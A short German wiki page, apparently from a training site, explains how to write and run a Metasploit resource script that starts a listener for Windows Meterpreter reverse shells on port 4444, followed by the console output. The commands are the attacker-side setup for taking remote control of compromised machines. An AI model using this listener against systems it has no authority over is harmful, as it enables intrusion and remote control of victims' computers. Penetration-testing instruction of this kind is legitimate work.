Metasploit script

Aus xinux.net
Zur Navigation springen Zur Suche springen

Erstellen eines Skriptes

  • vi reverse_shell-windows.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -j -z

Ausführen

  • msfconsole -r reverse_shell-windows.rc
                                                 
 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/


       =[ metasploit v6.2.3-dev                           ]
+ -- --=[ 2227 exploits - 1169 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Enable HTTP request and response logging 
with set HttpTrace true

[*] Processing reverse_shell-windows.rc for ERB directives.
resource (reverse_shell-windows.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (reverse_shell-windows.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (reverse_shell-windows.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (reverse_shell-windows.rc)> set LPORT 4444
LPORT => 4444
resource (reverse_shell-windows.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444 
msf6 exploit(multi/handler) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/handler) >